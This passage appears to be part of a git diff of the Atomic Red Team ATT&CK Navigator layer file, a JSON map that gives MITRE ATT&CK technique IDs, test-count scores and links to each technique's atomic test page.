Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":117,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":52,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":28,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View 